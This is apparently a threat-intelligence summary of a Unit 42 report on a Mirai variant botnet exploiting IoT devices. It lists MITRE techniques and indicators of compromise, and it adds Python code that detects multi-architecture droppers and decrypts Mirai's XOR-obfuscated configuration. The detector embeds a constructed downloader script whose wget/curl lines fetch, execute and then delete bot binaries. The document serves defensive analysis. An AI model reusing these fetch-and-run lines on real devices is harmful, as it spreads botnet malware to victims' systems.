Unit 42 outlines a Mirai variant campaign targeting IoT devices since March 2023, exploiting a wide set of IoT vulnerabilities to recruit devices into a botnet used for DDoS and other attacks. The campaigns share infrastructure and malware characteristics, with protections available from Palo Alto Networks and collaboration with the Cyber Threat Alliance. #Mirai #IZ1H9 #V3G4 #Zeroshell #DLink #NagiosXI #TP-LinkArcher
Keypoints
- Unit 42 observed threat actors using several IoT vulnerabilities to spread a Mirai variant since March 2023.
- The malware uses a shell script downloader to fetch bot clients built for multiple Linux architectures, executes them, and then deletes the client executable to cover its tracks.
- Campaigns appear to share infrastructure and nearly identical botnet samples, linking multiple campaigns to the same actor (IP sources include 185.44.81.114 and 193.32.162.189).
- The variant decrypts its configuration with the fixed 32-bit key 0xDEADBEEF; XORing its four bytes together (0xDE ^ 0xAD ^ 0xBE ^ 0xEF) yields the single-byte key 0x22 that is applied to every byte of the encrypted data (encrypted_char ^ 0x22 = decrypted_char).
- Telnet brute-force attempts and exploitation of numerous CVEs across many IoT device families provided initial access and let the botnet spread.
- Palo Alto Networks describes mitigations including IoT security, ML-based detection, WildFire, URL filtering, and CTA collaboration to disrupt actors.
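The keypoints above describe the downloader pattern (fetch one bot client per architecture, execute it, delete it) that also appears under the T1105 and T1070.004 entries below. The following added example, which is not code from the Unit 42 report or the campaign itself, parses a shell script and flags that execute-then-delete pattern. The sample script it runs on is constructed here in the style of a Mirai downloader; the host 192.0.2.10 is a documentation address, not the real payload server, and the file names are invented.

```python
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Constructed sample in the style of a Mirai shell script downloader. It is NOT
# the "y" script from the report; 192.0.2.10 is an RFC 5737 documentation address.
SAMPLE_DOWNLOADER = """\
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://192.0.2.10/bins/bot.arm7; chmod +x bot.arm7; ./bot.arm7; rm -rf bot.arm7
wget http://192.0.2.10/bins/bot.mips; chmod +x bot.mips; ./bot.mips; rm -rf bot.mips
wget http://192.0.2.10/bins/bot.mpsl; chmod +x bot.mpsl; ./bot.mpsl; rm -rf bot.mpsl
curl -s http://192.0.2.10/bins/bot.x86 -o bot.x86; chmod 777 bot.x86; ./bot.x86; rm -rf bot.x86
"""

# Constructed benign script for comparison: a single download, no execute-then-delete.
SAMPLE_BENIGN = """\
wget https://example.com/release/tool-1.2.tar.gz
tar xzf tool-1.2.tar.gz
"""

DOWNLOADERS = {"wget", "curl"}
# Suffixes Mirai-family droppers commonly use to name per-architecture payloads.
ARCH_HINTS = ("arm", "mips", "mpsl", "x86", "i586", "i686", "ppc", "sh4", "m68k", "spc", "sparc")


@dataclass
class Fetch:
    url: str
    filename: str
    executed: bool = False
    deleted: bool = False


def _commands(script: str):
    """Yield argv lists for every simple command, splitting on ; && and ||."""
    for line in script.splitlines():
        for cmd in re.split(r"\s*(?:;|&&|\|\|)\s*", line.strip()):
            argv = cmd.split()
            if argv:
                yield argv


def _output_name(argv, url):
    """Honour an explicit -O/-o output name, else fall back to the URL basename."""
    for flag in ("-O", "-o"):
        if flag in argv:
            i = argv.index(flag)
            if i + 1 < len(argv):
                return argv[i + 1]
    return urlparse(url).path.rsplit("/", 1)[-1]


def analyze_downloader(script: str) -> list:
    """Track each downloaded file through execution and deletion."""
    fetches = {}
    for argv in _commands(script):
        cmd = argv[0]
        if cmd in DOWNLOADERS:
            url = next((a for a in argv[1:] if a.startswith(("http://", "https://", "ftp://"))), None)
            if url:
                name = _output_name(argv, url)
                fetches[name] = Fetch(url=url, filename=name)
        elif cmd.startswith("./") and cmd[2:] in fetches:
            fetches[cmd[2:]].executed = True
        elif cmd == "rm":
            for name in argv[1:]:
                if name in fetches and fetches[name].executed:
                    fetches[name].deleted = True
    return list(fetches.values())


def is_multiarch_dropper(fetches, min_variants: int = 3) -> bool:
    """True when several architecture-named payloads from one host are run and then removed."""
    suspicious = [f for f in fetches if f.executed and f.deleted
                  and any(h in f.filename.lower() for h in ARCH_HINTS)]
    hosts = {urlparse(f.url).netloc for f in suspicious}
    return len(suspicious) >= min_variants and len(hosts) == 1


if __name__ == "__main__":
    for label, script in (("dropper", SAMPLE_DOWNLOADER), ("benign", SAMPLE_BENIGN)):
        found = analyze_downloader(script)
        print(label, is_multiarch_dropper(found), [f.filename for f in found])
```

The heuristic is deliberately narrow: it keys on the combination of download, execute and delete across several architecture-named files from one host, because any one of those steps alone is common in legitimate install scripts. The `ARCH_HINTS` substring match is coarse (a file named `alarm` contains `arm`), so treat a hit as a triage signal rather than a verdict.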
MITRE Techniques
- [T1190] Exploit Public-Facing Application – The threat actors exploit multiple IoT device vulnerabilities to run remote commands and download/execute bot clients (‘remote command execution exploit traffic’ and ‘shell script downloader would download and execute the bot clients to accommodate different Linux architectures’).
- [T1105] Ingress Tool Transfer – The shell script downloader downloads bot clients to accommodate various architectures and then executes them.
- [T1059.004] Command and Scripting Interpreter: Unix Shell – The shell script downloader and subsequent bot clients rely on shell scripting to run on Linux devices (‘shell script downloader’).
- [T1027] Obfuscated Files or Information – The configuration is decrypted with the fixed key 0xDEADBEEF, whose four bytes XOR together to the single-byte key 0x22 that is applied to each encrypted byte (‘encrypted_char ^ 0x22 = decrypted_char’).
- [T1070.004] Indicator Removal: File Deletion – The shell script downloader deletes the bot client it downloaded and ran (‘delete the client executable file to cover its tracks’).
- [T1110] Brute Force – Telnet brute-force attempts reported from 185.44.81.114 indicate credential guessing as an initial access step.
- [T1498] Network Denial of Service – Botnet traffic is used to conduct DDoS and other disruptive attacks once devices are compromised.
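The configuration decryption described in the keypoints and under T1027 above is the Mirai table scheme: the 32-bit key 0xDEADBEEF is split into four bytes that are XORed into each data byte in turn, which collapses to a single XOR with 0x22. The following added example, which is not code from the report or from the malware, reproduces that derivation, recovers strings from an encrypted table, and shows how to recover the key by brute force when a variant changes it. The encrypted table it decodes is constructed here from invented plaintext strings, not taken from a real sample.

```python
TABLE_KEY = 0xDEADBEEF  # the fixed key named in the report


def derive_xor_byte(table_key: int = TABLE_KEY) -> int:
    """Mirai applies k1, k2, k3, k4 (the key's four bytes) to every data byte in
    sequence; four XORs with constants collapse to one XOR with their XOR-sum."""
    k = 0
    for shift in (0, 8, 16, 24):
        k ^= (table_key >> shift) & 0xFF
    return k  # 0xDE ^ 0xAD ^ 0xBE ^ 0xEF == 0x22


def toggle_obf(data: bytes, table_key: int = TABLE_KEY) -> bytes:
    """Symmetric: the same call encrypts plaintext and decrypts ciphertext."""
    key = derive_xor_byte(table_key)
    return bytes(b ^ key for b in data)


def build_sample_table(entries) -> bytes:
    """Constructed test data: NUL-terminated strings encrypted the Mirai way. The
    encrypted terminator shows up as the key byte itself (0x00 ^ 0x22 == 0x22)."""
    return b"".join(toggle_obf(s + b"\x00") for s in entries)


def extract_strings(blob: bytes, key: int, min_len: int = 4) -> list:
    """Decrypt a blob with a known single-byte key and return the printable strings."""
    plain = bytes(b ^ key for b in blob)
    out = []
    for chunk in plain.split(b"\x00"):
        if len(chunk) >= min_len and all(0x20 <= c < 0x7F for c in chunk):
            out.append(chunk.decode("ascii"))
    return out


def guess_xor_key(blob: bytes) -> int:
    """Rank all 256 single-byte keys by how much of the output is printable ASCII
    or NUL; useful when a variant ships a different table_key."""
    def score(k: int) -> int:
        return sum(1 for b in blob if (b ^ k) == 0 or 0x20 <= (b ^ k) < 0x7F)
    return max(range(256), key=score)


# Invented plaintext entries, constructed for this example only.
SAMPLE_STRINGS = [b"/bin/busybox", b"/dev/watchdog", b"/proc/", b"shell", b"enable", b"REPORT %s:%s"]
SAMPLE_TABLE = build_sample_table(SAMPLE_STRINGS)

if __name__ == "__main__":
    key = derive_xor_byte()
    print(f"derived key: 0x{key:02x}, brute-forced key: 0x{guess_xor_key(SAMPLE_TABLE):02x}")
    for s in extract_strings(SAMPLE_TABLE, key):
        print(s)
```

Two points worth keeping in mind when applying this to a real sample: because the scheme is a single-byte XOR, the most frequent byte in a string table is usually the encrypted NUL terminator and therefore the key itself, and the printable-ratio ranking in `guess_xor_key` is only reliable when the table contains a mix of lowercase, uppercase, punctuation and NULs, since a short all-lowercase table can leave several keys tied.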
Indicators of Compromise
- [File Hash] Shell Script Downloader Samples – 888f4a852642ce70197f77e213456ea2b3cfca4a592b94647827ca45adf2a5b8
- [File Hash] Mirai Samples – b43a8a56c10ba17ddd6fa9a8ce10ab264c6495b82a38620e9d54d66ec8677b0c
- [File Hash] Mirai Samples – b45142a2d59d16991a38ea0a112078a6ce42c9e2ee28a74fb2ce7e1edf15dce3
- [Domain] Command infrastructure – zvub.us
- [IP Address] 185.44.81.114 – observed as campaign source (Oct 2022–Mar 2023)
- [IP Address] 185.225.74.251 – campaign activity after Mar 2023
- [IP Address] 193.32.162.189 – another campaign source
- [File Name] y – shell script downloader file name referenced in the campaign
Read more: https://unit42.paloaltonetworks.com/mirai-variant-targets-iot-exploits/